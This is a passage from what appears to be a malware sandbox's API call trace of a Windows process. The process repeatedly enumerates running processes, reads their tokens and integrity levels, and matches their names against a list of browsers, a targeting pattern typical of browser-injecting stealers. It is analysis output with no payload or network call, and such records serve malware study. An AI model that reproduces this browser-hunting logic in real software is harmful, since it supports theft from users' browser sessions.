[4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.467] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.468] GetLastError () returned 0x7a [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.468] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.468] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.468] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0243.468] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0243.468] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0243.468] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0243.468] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0243.468] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0243.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0243.468] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.468] GetLastError () returned 0x7a [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.468] CloseHandle (hObject=0xb8) returned 1 [0243.468] CloseHandle (hObject=0xb4) returned 1 [0243.468] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.468] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.468] GetLastError () returned 0x7a [0243.468] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.468] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.468] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.469] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0243.469] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0243.469] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0243.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0243.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0243.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0243.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0243.469] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.469] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.469] GetLastError () returned 0x7a [0243.469] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.469] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.469] CloseHandle (hObject=0xb8) returned 1 [0243.469] CloseHandle (hObject=0xb4) returned 1 [0243.469] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.469] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.469] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.469] GetLastError () returned 0x7a [0243.469] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.469] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.469] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.469] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.469] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0243.469] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0243.470] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.470] GetLastError () returned 0x7a [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.470] CloseHandle (hObject=0xb8) returned 1 [0243.470] CloseHandle (hObject=0xb4) returned 1 [0243.470] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.470] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.470] GetLastError () returned 0x7a [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.470] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.470] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.470] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0243.470] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0243.470] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0243.470] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0243.470] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0243.470] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0243.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0243.470] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.470] GetLastError () returned 0x7a [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.470] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.471] CloseHandle (hObject=0xb8) returned 1 [0243.471] CloseHandle (hObject=0xb4) returned 1 [0243.471] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.471] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.471] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.471] GetLastError () returned 0x7a [0243.471] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.471] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.471] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.471] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0243.471] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0243.471] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.471] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.471] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.471] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0243.471] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.471] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.471] GetLastError () returned 0x7a [0243.471] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.471] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.471] CloseHandle (hObject=0xb8) returned 1 [0243.471] CloseHandle (hObject=0xb4) returned 1 [0243.471] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.471] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.472] GetLastError () returned 0x7a [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.472] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.472] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.472] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0243.472] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0243.472] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0243.472] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0243.472] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0243.472] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0243.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0243.472] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.472] GetLastError () returned 0x7a [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.472] CloseHandle (hObject=0xb8) returned 1 [0243.472] CloseHandle (hObject=0xb4) returned 1 [0243.472] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.472] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.472] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.472] GetLastError () returned 0x7a [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.473] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.473] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.473] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0243.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0xb4 [0243.473] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.473] GetLastError () returned 0x7a [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.473] CloseHandle (hObject=0xb8) returned 1 [0243.473] CloseHandle (hObject=0xb4) returned 1 [0243.473] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.473] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.473] GetLastError () returned 0x7a [0243.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.473] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.473] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.473] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0243.473] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0243.473] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0243.473] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0243.473] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0243.473] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0243.473] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0243.474] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0245.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbc68) returned 0xc0000004 [0245.474] VirtualAlloc (lpAddress=0x0, dwSize=0xcc68, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0245.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcc68, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0245.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0245.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0245.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0245.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0245.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0245.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0245.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0245.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0245.478] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.478] GetLastError () returned 0x7a [0245.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, 